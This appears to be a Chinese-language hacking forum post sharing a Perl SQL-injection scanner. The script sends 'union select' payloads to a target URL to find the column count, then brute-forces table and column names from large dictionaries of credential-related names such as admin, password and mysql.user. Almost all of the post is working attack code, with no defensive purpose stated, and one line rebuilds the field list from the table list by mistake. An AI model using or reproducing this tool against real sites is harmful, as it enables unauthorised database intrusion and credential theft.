[原创]字段和表段扫描perl版
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])文章作者:outstand
[language=perl]#by 小杰 thanks for my all friends.
#578757691#163.com
#[url]http://hi.baidu.com/hnnsg[/url]
#!/usr/bin/perl
#usage: perl perl.pl [url]http://www...[/url]
use IO::Socket;
$keywords="TOM";
$Dict_Table="Dict_Table.txt";
$Dict_Field="Dict_Field.txt";
@tabledic= ("name","pwd","jobs","links","users","username","usernames","mysql.user","member","members","admin","administrator","administrators","login","logins","logon","userrights","superuser","control","usercontrol","author","autore","artikel","newsletter","tb_user","tb_users","tb_username","tb_usernames","tb_admin","tb_administrator","tb_member","tb_members","tb_login","perdorues","korisnici","webadmin","webadmins","webuser","webusers","webmaster","webmasters","customer","customers","sysuser","sysusers","sysadmin","sysadmins","memberlist","tbluser","tbl_user","tbl_users","a_admin","x_admin","m_admin","adminuser","admin_user","adm","userinfo","user_info","admin_userinfo","userlist","user_list","user_admin","user_login","admin_user","admin_login","login_user","login_users","login_admin","login_admins","sitelogin","site_login","sitelogins","site_logins","SiteLogin","Site_Login","User","Users","Admin","Admins","Login","Logins","adminrights","news","table","tables","perdoruesit");
@fielddic= ("admin","name","jobname","user","username","password","passwd","pass","email","emri","fjalekalimi","pwd","user_name","user_password","name","id","user_pass","admin_user","admin_password","user_pass","admin_pass","usern","user_n","users","login","logins","login_user","login_admin","login_username","user_username","user_login","auid","apwd","adminid","admin_id","adminuser","admin_user","adminuserid","admin_userid","adminusername","admin_username","adminname","admin_name","usr","usr_n","usrname","usr_name","usrpass","usr_pass","usrnam","nc","uid","userid","user_id","myusername","mail","emni","logohu","punonjes","kpro_user","wp_users","emniplote","perdoruesi","perdorimi","punetoret","logini","llogaria","fjalekalimin","kodi","emer","ime","korisnik","korisnici","user1","administrator","administrator_name","mem_login","login_password","login_pass","login_passwd","login_pwd","sifra","lozinka","psw","pass1word","pass_word","passw","pass_w","user_passwd","userpass","userpassword","userpwd","user_pwd","useradmin","user_admin","mypassword","passwrd","admin_pwd","admin_pass","admin_passwd","mem_password","memlogin","userid","admin_id","adminid","e_mail","usrn","u_name","uname","mempassword","mem_pass","mem_passwd","mem_pwd","p_word","pword","p_assword","myusername","myname","my_username","my_name","my_password","my_email");
if (!@ARGV){
print "please inset the url:";
chomp($url=<STDIN>);
}else{
$url=@ARGV[0];
}
if($url !~ /http:\/\//) {
$url= "http://".$url;
}
$url =~ m/http:\/\/(.*?)\/(.*)/;
my @url=();
my $lengh;
foreach $len(1..50)
{
$one=$url."/**/and/**/1=1/**/union/**/select/**/";
for($i=1;$i<=$len; $i++)
{
$one=$one.$i;
if($i==$len){
next;
}
$one=$one.",";
}
$one=$one."/*";
system("cls");
print "[+]scan field length...\n";
print "$one \n";
$data=get("$one");
#push @url,$one;
if($data=~/$keywords/)
{
$lengh=$len;
print "[-]field length is : $len \n";
#print $data;
last;
}
}
print "[+]start scan table...\n";
@tlist=gettextlist($Dict_Table);
@tabledic=(@tabledic,@tlist);
#print "@tabledic";
@flist=gettextlist($Dict_Field);
@fielddic=(@tabledic,@flist);
#print "@fielddic";
foreach $table(@tabledic)
{
$two=$one."*/from/**/$table/*";
#print "$two \n";
$data=get("$two");
if($data=~/$keywords/)
{
#print "[-] $table\n";
push @table,$table;
}
}
foreach(@table)
{
print "[-] $_ \n";
}
print "[+]start scan field...\n";
print "[+]please inset you want to scan the table:";
chomp($tableone=<STDIN>);
print "[+]please check the field length:";
chomp($fieldindex=<STDIN>);
if (!$tableone){
$tableone="mysql.user";
print " table is unset,value is set $tableone \n";
}
if (!$fieldindex){
$fieldindex="4";
print " the fieldindex is unset,value is set $fieldindex \n";
}
foreach $field(@fielddic)
{
local $three;
$three=$url."/**/and/**/1=1/**/union/**/select/**/";
#print "\n$lengh";
for($i=1;$i<=$lengh; $i++)
{
if($i==$fieldindex)
{
$three=$three.$field;
$three=$three.",";
next;
}
$three=$three.$i;
if($i==$lengh){
next;
}
$three=$three.",";
}
$three=$three."/**/from/**/$tableone/*";
#print "$three";
$data=get("$three");
if($data=~/$keywords/)
{
print "[-] $field\n";
push @field,$field;
}
}
foreach(@field)
{
print "[-] $_ \n";
}
print "------end------";
sub gettextlist()
{
my @textlist=();
my $textname=$_[0];
open FILE,$textname or die "Can't open '$textname': $!";
foreach $lines(<FILE>)
{
chomp($lines);
push @textlist,$lines;
}
#print "@textlist";
return @textlist;
}
#thanks the google
sub timeout()
{
close $sock;
#die "timeout";
}
sub get()
{
local $request = $_[0];
local $port = 80;
local $temp = "";
if(local($server, $url) = $request =~ /^http\:\/\/([^\/]+)\/(.+)$/)
{
if($server =~ /^([^\:]+)\:([0-9]{2,5})$/){ $server = $1; $port = $2; }
$sock = IO::Socket::INET->new(
PeerAddr => $server,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM,
TimeOut => $timeout
) or return 0; # connection failed
print $sock "GET /$url HTTP/1.0\r\nHost: $server\r\n\r\n";
$SIG{ALRM} = \&timeout; alarm 10;
while(<$sock>){ $temp .= $_; }
alarm 0; close $sock;
}
return $temp;
}[/language]
方便搜集字典,自己定义关键字和字典,array形式和的txt形式的,但是会重复,本来想写下过滤掉重复的,但是最近忙,将就下哈! 表段好像不是很全啊~~ 结合明小子 啊d nbsi 等再添加一些
页:
[1]